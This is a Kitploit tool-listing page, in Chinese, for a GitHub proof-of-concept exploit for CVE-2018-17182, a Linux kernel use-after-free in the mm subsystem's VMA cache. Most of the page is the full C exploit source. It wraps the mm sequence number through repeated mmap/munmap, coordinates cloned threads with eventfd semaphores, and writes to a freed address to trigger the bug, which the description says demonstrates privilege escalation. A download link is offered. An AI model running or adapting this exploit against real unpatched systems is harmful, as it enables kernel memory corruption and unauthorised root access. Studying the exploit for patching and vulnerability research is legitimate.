Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2018-17182 — 针对CVE-2018-17182的概念验证漏洞利用程序,该漏洞是Linux内核mm子系统中的一个释放后使用(use-after-free)漏洞,通过VMA操纵和缓存槽位破坏来演示权限提升。 | Kitploit
工具/GitHubGitHub/jedai47/cve-2018-17182
内存取证漏洞分析漏洞利用学习与教育二进制利用
GitHubjedai47/cve-2018-17182

cve-2018-17182

针对CVE-2018-17182的概念验证漏洞利用程序,该漏洞是Linux内核mm子系统中的一个释放后使用(use-after-free)漏洞,通过VMA操纵和缓存槽位破坏来演示权限提升。

查看仓库
43年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

#define _GNU_SOURCE #include <string.h> #include <sys/eventfd.h> #include <sys/signal.h> #include <sys/syscall.h> #include <sys/prctl.h> #include <stdlib.h> #include <sys/mman.h> #include <err.h> #include <stdio.h> #include <sched.h> #include <unistd.h>

int vma_spam_control_fd = -1; int thread_done_fd = -1; int vma_spam_done_fd = -1; void sem_inc(int fd) { uint64_t val = 1; if (write(fd, &val, 8) != 8) err(1, "sem_inc"); } void sem_dec(int fd) { uint64_t val; if (read(fd, &val, 8) != 8) err(1, "sem_dec"); }

void vma_spam_child(void) { prctl(PR_SET_PDEATHSIG, SIGKILL); for (int i=0; i<2; i++) { sem_dec(vma_spam_control_fd); for (int i=0; i<1000; i++) { char *addr = mmap(NULL, 0x2000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (addr == MAP_FAILED) err(1, "mmap spam"); mprotect(addr, 0x1000, PROT_READ); } } sem_inc(vma_spam_done_fd); }

unsigned char child_stack_area[0x8000];

int empty_child_fn(void dummy) { syscall(__NR_exit, 0); / 不可达 */ return 0; }

#define UAF_ADDR ((char*)0x133700000000)

int child_fn(void *dummy) { prctl(0x13371337);

root@kitploit:~
void *p = mmap(NULL, 0x3000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0);
if (p == MAP_FAILED) err(1, "mmap");
p += 0x1000;

for (unsigned long i=0UL; 1; i+=2) {
	unsigned long mm_seq = i; // 偶数
	unsigned long task_seq = mm_seq - 2;
	if (mm_seq == 0xfffffffaUL) break;
	//if (mm_seq == 0xfffaUL) break;
	if ((i % 0x1000000) == 0) {
		/*
		char state[100];
		sprintf(state, "mm_seq(2) = 0x%lx\n", mm_seq);
		write(1, state, strlen(state));
		*/
		// mm_sequence == i - 1
		// task_sequence == mm_sequence - 2
		//printf("at 0x%lx\n", i);
		prctl(0x13371337);
	}
	p = mmap(p, 0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE|MAP_FIXED, -1, 0);
	if (p == MAP_FAILED) err(1, "mmap");
}
sem_inc(vma_spam_control_fd);
for (unsigned long i = 0; i < 4; i++) {
	munmap(UAF_ADDR + i*0x200000, 0x10000);
}
munmap(p-0x1000, 0x3000);
sem_inc(vma_spam_control_fd);
sem_dec(vma_spam_done_fd);

prctl(0x13371337);
sleep(1);
sem_inc(thread_done_fd);

syscall(__NR_exit, 0);
/* 不可达 */
return 0;

}

int main(void) { cpu_set_t cset; CPU_ZERO(&cset); CPU_SET(0, &cset); if (sched_setaffinity(0, sizeof(cpu_set_t), &cset)) err(1, "affinity");

root@kitploit:~
vma_spam_control_fd = eventfd(0, EFD_SEMAPHORE);
thread_done_fd = eventfd(0, EFD_SEMAPHORE);
vma_spam_done_fd = eventfd(0, EFD_SEMAPHORE);

int spchild = fork();
if (spchild == -1) err(1, "fork");
if (spchild == 0) {
	vma_spam_child();
	exit(0);
}

#define LONELY_MAPPING_ADDR ((char*)0x133800600000UL)
char *lonely_mapping = mmap(LONELY_MAPPING_ADDR, 0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (lonely_mapping != LONELY_MAPPING_ADDR)
	err(1, "mmap lonely mapping");

for (unsigned long i=0; i<4; i++) {
	void *addr = UAF_ADDR + i * 0x200000;
	if (mmap(addr, 0x10000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0) != addr)
		err(1, "mmap UAF_ADDR");
	if (madvise(addr, 0x10000, MADV_RANDOM))
		err(1, "madvise");
}

prctl(0x13371337);
void *p = mmap(NULL, 0x3000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0);
if (p == MAP_FAILED) err(1, "mmap");
p += 0x1000;
for (unsigned long i=6UL; 1; i+=2) {
	unsigned long mm_seq = i - 1; // 始终为奇数!
	unsigned long task_seq = mm_seq - 2;
	if (mm_seq == 0xffffffffUL) break;
	//if (mm_seq == 0xffffUL) break;
	if ((i % 0x1000000) == 0) {
		// mm_sequence == i - 1
		// task_sequence == mm_sequence - 2
		//printf("at 0x%lx\n", i);
		/*
		char state[100];
		sprintf(state, "mm_seq(1) = 0x%lx\n", mm_seq);
		write(1, state, strlen(state));
		*/
		prctl(0x13371337);
	}
	p = mmap(p, 0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE|MAP_FIXED, -1, 0);
	if (p == MAP_FAILED) err(1, "mmap");
}

// 粗暴的 hack:将所有我们需要的内容都 fault in
int child_tmp = clone(empty_child_fn, child_stack_area+sizeof(child_stack_area), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_THREAD|CLONE_VM, NULL);
sleep(3);
sem_inc(thread_done_fd);
sem_dec(thread_done_fd);

// 尝试让 UAF_ADDR 被缓存
for (unsigned long i=0; i<4; i++) {
	UAF_ADDR[i * 0x200000] = 1;
}

// 再来一次,使 mm_seq 回绕到 0。
// 这应该是一个小映射,以避免刷爆缓存。
munmap(lonely_mapping, 0x1000);
prctl(0x13371337);
int child = clone(child_fn, child_stack_area+sizeof(child_stack_area), CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|CLONE_THREAD|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
	err(1, "clone");
sem_dec(thread_done_fd); // 等待回绕

// #### 将乘数调整到 0..3 范围内,以便使用一个缓存槽
// #### 该缓存槽不会被破坏
UAF_ADDR[0x4000 + 1 * 0x200000] = 1;

prctl(0x13371337);

}

下载工具